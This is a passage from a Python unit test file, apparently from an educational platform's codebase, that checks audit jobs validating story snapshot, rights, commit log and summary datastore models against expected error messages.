u'[u\'failed validation check for story_ids '
'field check of StorySnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field story_ids '
'having value 0, expect model StoryModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'story_ids having value 0, expect model '
'StoryModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'StorySnapshotMetadataModel\', 2]')]
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of StorySnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'StorySnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StorySnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story model '
'version check of StorySnapshotMetadataModel\', '
'[u\'Entity id 0-3: Story model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated StorySnapshotMetadataModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_story_node'
}, {
'cmd': 'delete_story_node',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_story_node check of '
'StorySnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'delete_story_node\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'node_id, The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd add_story_node '
'check of StorySnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_story_node\'} '
'failed with error: The following required attributes '
'are missing: node_id, title"]]'
), u'[u\'fully-validated StorySnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StorySnapshotContentModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StorySnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StorySnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
story_models.StorySnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
story_models.StorySnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StorySnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StorySnapshotContentModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StorySnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'StorySnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StorySnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StorySnapshotContentModel\', '
'[u"Entity id 0-1: based on field story_ids '
'having value 0, expect model StoryModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'story_ids having value 0, expect model '
'StoryModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'StorySnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StorySnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story model '
'version check of StorySnapshotContentModel\', '
'[u\'Entity id 0-3: Story model corresponding to '
'id 0 has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
), (
u'[u\'fully-validated StorySnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StoryRightsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.admin = user_services.UserActionsInfo(self.admin_id)
manager1_email = 'user@manager1.com'
manager2_email = 'user@manager2.com'
self.signup(manager1_email, 'manager1')
self.signup(manager2_email, 'manager2')
self.set_topic_managers(['manager1', 'manager2'])
self.manager1_id = self.get_user_id_from_email(manager1_email)
self.manager2_id = self.get_user_id_from_email(manager2_email)
self.manager1 = user_services.UserActionsInfo(self.manager1_id)
self.manager2 = user_services.UserActionsInfo(self.manager2_id)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
story_services.assign_role(
self.admin, self.manager1, story_domain.ROLE_MANAGER, stories[0].id)
story_services.assign_role(
self.admin, self.manager2, story_domain.ROLE_MANAGER, stories[0].id)
story_services.assign_role(
self.admin, self.manager2, story_domain.ROLE_MANAGER, stories[1].id)
self.model_instance_0 = story_models.StoryRightsModel.get_by_id('0')
self.model_instance_1 = story_models.StoryRightsModel.get_by_id('1')
self.model_instance_2 = story_models.StoryRightsModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.StoryRightsModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated StoryRightsModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryRightsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryRightsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field story_ids having '
'value 0, expect model StoryModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_manager_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.manager1_id).delete()
expected_output = [
(
u'[u\'failed validation check for manager_user_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field manager_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (
self.manager1_id, self.manager1_id),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
story_models.StoryRightsSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model '
'StoryRightsSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'
),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
story_models.StoryRightsSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model StoryRightsSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(StoryRightsSnapshotMetadataModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
if story.id != '0':
story_services.save_new_story(self.owner_id, story)
else:
story_services.save_new_story(self.user_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StoryRightsSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
story_models.StoryRightsSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
story_models.StoryRightsSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StoryRightsSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated StoryRightsSnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'StoryRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_rights_model_failure(self):
story_models.StoryRightsModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for story_rights_ids '
'field check of StoryRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field story_rights_ids '
'having value 0, expect model StoryRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'story_rights_ids having value 0, expect model '
'StoryRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'StoryRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of StoryRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'StoryRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StoryRightsSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story rights model '
'version check of StoryRightsSnapshotMetadataModel\', '
'[u\'Entity id 0-3: StoryRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated '
'StoryRightsSnapshotMetadataModel\', 3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'change_role',
'assignee_id': 'id',
'new_role': 'manager'
}, {
'cmd': 'publish_story',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'change_role check of '
'StoryRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'assignee_id\': u\'id\', '
'u\'cmd\': u\'change_role\', u\'new_role\': u\'manager\'} '
'failed with error: The following required attributes '
'are missing: old_role"]]'
), (
u'[u\'failed validation check for commit cmd publish_story '
'check of StoryRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'publish_story\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following extra attributes are present: '
'invalid_attribute"]]'
), u'[u\'fully-validated StoryRightsSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsSnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(StoryRightsSnapshotContentModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StoryRightsSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
story_models.StoryRightsSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
story_models.StoryRightsSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StoryRightsSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated StoryRightsSnapshotContentModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryRightsSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'StoryRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryRightsSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryRightsModel.get_by_id('0').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for story_rights_ids '
'field check of StoryRightsSnapshotContentModel\', '
'[u"Entity id 0-1: based on field story_rights_ids '
'having value 0, expect model StoryRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'story_rights_ids having value 0, expect model '
'StoryRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'StoryRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StoryRightsSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story rights model '
'version check of StoryRightsSnapshotContentModel\', '
'[u\'Entity id 0-3: StoryRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot content model id\']]'
), (
u'[u\'fully-validated StoryRightsSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class StoryCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StoryCommitLogEntryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StoryCommitLogEntryModel.get_by_id(
'story-0-1'))
self.model_instance_1 = (
story_models.StoryCommitLogEntryModel.get_by_id(
'story-1-1'))
self.model_instance_2 = (
story_models.StoryCommitLogEntryModel.get_by_id(
'story-2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StoryCommitLogEntryModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StoryCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryCommitLogEntryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryCommitLogEntryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StoryCommitLogEntryModel\', '
'[u"Entity id story-0-1: based on field story_ids '
'having value 0, expect model StoryModel with id 0 '
'but it doesn\'t exist", u"Entity id story-0-2: based '
'on field story_ids having value 0, expect model '
'StoryModel with id 0 but it doesn\'t exist"]]'
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StoryCommitLogEntryModel.create(
'0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
'msg', [{}],
constants.ACTIVITY_STATUS_PUBLIC, False))
model_with_invalid_version_in_id.story_id = '0'
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story model '
'version check of StoryCommitLogEntryModel\', '
'[u\'Entity id %s: Story model corresponding '
'to id 0 has a version 1 which is less than '
'the version 3 in commit log entry model id\']]'
) % (model_with_invalid_version_in_id.id),
u'[u\'fully-validated StoryCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_id(self):
model_with_invalid_id = (
story_models.StoryCommitLogEntryModel(
id='invalid-0-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, commit_type='edit',
commit_message='msg', commit_cmds=[{}],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_is_private=False))
model_with_invalid_id.story_id = '0'
model_with_invalid_id.put()
expected_output = [
(
u'[u\'failed validation check for model id check of '
'StoryCommitLogEntryModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % (model_with_invalid_id.id), (
u'[u\'failed validation check for commit cmd check of '
'StoryCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
'No commit command domain object defined for entity with '
'commands: [{}]\']]'),
u'[u\'fully-validated StoryCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_type(self):
self.model_instance_0.commit_type = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit type check of '
'StoryCommitLogEntryModel\', '
'[u\'Entity id story-0-1: Commit type invalid is '
'not allowed\']]'
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_post_commit_status(self):
self.model_instance_0.post_commit_status = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit status check '
'of StoryCommitLogEntryModel\', '
'[u\'Entity id story-0-1: Post commit status invalid '
'is invalid\']]'
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_true_post_commit_is_private(self):
self.model_instance_0.post_commit_status = 'public'
self.model_instance_0.post_commit_is_private = True
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of StoryCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'public but post_commit_is_private is True\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_false_post_commit_is_private(self):
self.model_instance_0.post_commit_status = 'private'
self.model_instance_0.post_commit_is_private = False
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of StoryCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'private but post_commit_is_private is False\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_story_node'
}, {
'cmd': 'delete_story_node',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_story_node check of '
'StoryCommitLogEntryModel\', '
'[u"Entity id story-0-1: Commit command domain '
'validation for command: {u\'cmd\': u\'delete_story_node\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: node_id, '
'The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd '
'add_story_node check of StoryCommitLogEntryModel\', '
'[u"Entity id story-0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_story_node\'} '
'failed with error: The following required attributes '
'are missing: node_id, title"]]'
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StorySummaryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StorySummaryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
language_codes = ['ar', 'en', 'en']
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for index, story in enumerate(stories):
story.description = 'story-test'
story.language_code = language_codes[index]
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = story_models.StorySummaryModel.get_by_id('0')
self.model_instance_1 = story_models.StorySummaryModel.get_by_id('1')
self.model_instance_2 = story_models.StorySummaryModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.StorySummaryModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '1', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StorySummaryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StorySummaryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated StorySummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
story_services.delete_story(self.owner_id, '1')
story_services.delete_story(self.owner_id, '2')
expected_output = [(
u'[u\'failed validation check for current time check of '
'StorySummaryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_model = story_models.StoryModel.get_by_id('0')
story_model.delete(feconf.SYSTEM_COMMITTER_ID, '', [])
self.model_instance_0.story_model_last_updated = (
story_model.last_updated)
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StorySummaryModel\', '
'[u"Entity id 0: based on field story_ids having '
'value 0, expect model StoryModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated StorySummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_node_count(self):
self.model_instance_0.node_count = 10
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for node count check of '
'StorySummaryModel\', [u\'Entity id 0: Node count: 10 does '
'not match the number of nodes in story_contents dict: []\']]'
), u'[u\'fully-validated StorySummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_story_related_property(self):
self.model_instance_0.title = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for title field check of '
'StorySummaryModel\', '
'[u\'Entity id %s: title field in entity: invalid does not '
'match corresponding story title field: title 0\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated StorySummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class UserSubscriptionsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
